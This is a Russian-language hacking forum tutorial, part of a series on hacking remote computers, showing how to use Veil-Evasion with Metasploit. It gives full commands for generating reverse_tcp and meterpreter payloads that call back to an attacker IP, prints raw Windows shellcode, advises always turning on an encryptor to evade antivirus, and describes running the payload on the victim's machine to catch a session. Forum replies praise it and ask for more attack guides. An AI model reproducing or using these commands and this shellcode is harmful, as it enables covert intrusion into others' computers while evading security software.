![]() |
Установка
Часть первая. Veil Ordnance. Часть вторая. Veil Evasion Взлом удаленного компьютера. Veil-Evasion. Metasploit. Итак Evasion. Мощнейший генератор пейлоадов самого различного формата, может дофига всего: от генерации макросов до простых екзешников. Так же как и Ordnance, Evasion можно использовать либо командами для быстрой генерации, либо через меню. Через меню вы тщательнее изучаете кишки фреймворка, а командами уже быстро генерите что-то своё при изменении каких-нибудь входных данных. Например: Код: Код:
./Veil.py -t Evasion -p 3 -c architecture=x86 posh_batch=/usr/share/veil-output/source/use20.bat -o macro3Допустим, вы перегенерировали скрипт или нужно сменить архитектуру, и вместо того чтобы заного заходить в меню фреймворка, вспоминать что у вас там было, устанавливать параметры... вы генерируете макрос одной строкой. Батник сформировал 20-ым пейлоадом. Evasion может на первый взгляд показаться громоздким, но это не так (вроде бы). План:
Код: Код:
./Veil.py -t Evasion --list-payloadshttps://forum.antichat.xyz/attachments/4790102/1.png Код: Код:
./Veil.py -t Evasion -p 27 --ordnance-payload rev_tcp --ip 192.168.6.30 --port 4443 -o use27По итогу отработки мы получим скрин https://forum.antichat.xyz/attachments/4790102/3.png [*] Language: Язык, который использоваться при создании нагрузки[*] Payload Module: Модуль нагрузки[*] Executable written to: Место куда записался исполняемый файл (его и нужно доставить на целевой компутер)[*] Source code written to: Исходный код[*] Metasploit RC file written to: RC файл для metasploit, который используется для быстрого запуска листенера. Код: Код:
./Veil.py -t Evasion -p 12 --msfvenom windows/meterpreter/reverse_tcp --ip 192.168.6.30 --port 4444 -o use12Некоторые пейлоады могут нести в себе различные кастомные параметры, которые так же можно задавать командой. Возьмём для примера python/shellcode_inject/des_encrypt, имеющий порядковый номер 32 в Evasion https://forum.antichat.xyz/attachments/4790102/5.png Код: Код:
./Veil.py -t Evasion -p 32 --ordnance-payload rev_tcp --ip 192.168.6.30 --port 4444 -o use32 -c use_pyherion=y hostname=thegrid processors=2Код: Код:
./Veil.py --cleanhttps://forum.antichat.xyz/attachments/4790102/8.png Evasion в меню фреймворка Разбор генерации кастомных шеллкодов При использовании некоторых пейлоадов можно выбрать кастомный шеллкод, если так, то при генерации вам встретится сиё окно https://forum.antichat.xyz/attachments/4790102/9.png 1 - генерация с помощью Ordnance Данный инструмент был разобран в первой части 2 - генерация с MSFVenom MSFVenom в своей обычной среде обитания может создавать нагрузки для многих операционных систем (винда, линух, андроид), однако в Veil Evasion можно создавать только виндовую нагрузку о чём, собственно, нас и уведомит нажатие Tab https://forum.antichat.xyz/attachments/4790102/10.png Стоит отметить что MSFVenom огромный генератор пейлоадов со своей спецификой и особенностями, изучение которых займёт не одну неделю. 3 - кастомный шеллкод, который вы создали где-то на стороне. https://forum.antichat.xyz/attachments/4790102/11.png Имеет вид \xfc\xe8\x86\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x 8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f \xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x 2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52 \x10\x8b\x42\x3c\x8b\x4c\x10\x78\xe3\x4a\x01\xd1\x 51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3c\x49\x8b \x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x 01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75 \xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x 58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24 \x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x 12\xeb\x89\x5d\x68\x6e\x65\x74\x00\x68\x77\x69\x6e \x69\x54\x68\x4c\x77\x26\x07\xff\xd5\x31\xdb\x53\x 53\x53\x53\x53\x68\x3a\x56\x79\xa7\xff\xd5\x53\x53 \x6a\x03\x53\x53\x68\x5b\x11\x00\x00\xeb\x4e\x50\x 68\x57\x89\x9f\xc6\xff\xd5\x53\x68\x00\x32\xe0\x84 \x53\x53\x53\xeb\x3d\x53\x50\x68\xeb\x55\x2e\x3b\x ff\xd5\x96\x6a\x10\x5f\x68\x80\x33\x00\x00\x89\xe0 \x6a\x04\x50\x6a\x1f\x56\x68\x75\x46\x9e\x86\xff\x d5\x53\x53\x53\x53\x56\x68\x2d\x06\x18\x7b\xff\xd5 \x85\xc0\x75\x18\x4f\x75\xd9\x68\xf0\xb5\xa2\x56\x ff\xd5\xeb\x42\xe8\xbe\xff\xff\xff\x2f\x31\x74\x52 \x65\x00\x00\x6a\x40\x68\x00\x10\x00\x00\x68\x00\x 00\x40\x00\x53\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53 \x53\x89\xe7\x57\x68\x00\x20\x00\x00\x53\x56\x68\x 12\x96\x89\xe2\xff\xd5\x85\xc0\x74\xbf\x8b\x07\x01 \xc3\x85\xc0\x75\xe5\x58\xc3\xe8\x69\xff\xff\xff\x 31\x39\x32\x2e\x31\x36\x38\x2e\x30\x2e\x31\x00 закидывать его необходимо в одну строку, без кавычек. 4 - Тоже кастомный шеллкод, но уже считываемый из файла. Указываем прямой путь до него. https://forum.antichat.xyz/attachments/4790102/12.png 5 - Бинарный файл с шеллкодом https://forum.antichat.xyz/attachments/4790102/13.png Указываем, соответственно, путь до бинарника. Пейлоады Список был дан в начале статьи. В начале было желание разобрать каждый и дать по нему инфу, но меня хватило где-то до 14-ого, потом уже понял что действия одни и теже, посему уже приведённых выше примеров более чем достаточно, да и Vander так же достаточно подробно всё расписал. Также был найдет отличный видос, где чел пробует запускать каждый (почти) пейлоад. Использование Создаёте нагрузку, используя любой пейлоад из доступных. Если есть опция USE_PYHERION (ето енкриптор, позволяет более менее обходить AV), то всегда ставьте её в Y. Используя силу джедая, запускаете пейлоад на компьютере атакуемого. Если антивирус не сожрал, то ловите сессию в meterpreter. Тем более что rc файл для быстрого его запуска Veil в большинстве случаев заблаговременно создаёт. Строка "Metasploit RC file written to". Затем Код: Код:
msfconsole -r тут_строка_до_rc_файлаСпасибо за внимание) Установка Часть первая. Veil Ordnance. Часть вторая. Veil Evasion Взлом удаленного компьютера. Veil-Evasion. Metasploit. |
Итак, призываю все группы оценивать статью с помощью систем репутации, "Мне нравится" или комментариев.
Отныне, просто состоять в группе мало для того, чтобы в ней оставаться. Ваша задача, так же наставлять авторов и оценивать их. Критерии: Статья достойна репутации +1 балл Статья отстой и/или не соблюдены правила -1 балл Статья неплохая, но на репу не катит - поставить лайк - оставить комментарий. Статья нейтральная не гавно но и не шедевр - оставить комментарий. Grey @a113 @AL04E @Celestial @d7uk4r3v @DoberGroup @ghost @Ishikawa @JuicyBrute @koldonuuchu @MAdDog719 @nemainthium @Underwood @Vertigo @WIPE Red @Dr.Jo.Frink @Dr.Lafa @grapf92 @id2746 @IioS @Ondrik8 @r1991omen @Sniff @z3RoTooL Eleet @ghostphisher @kot-gor @PingVinich @SooLFaa @Vander @~~DarkNode~~ |
Ставлю репу. Вот конктретно за эту статью, а именно за разжевал до буквы - меньше тем будет пустобрешных от недопонятых. Автору пожелаение: запилить серию статей как ты с этим фреймоворком в атаку ходишь. Со всеми подробностями и тонкостями
|
| Время: 13:59 |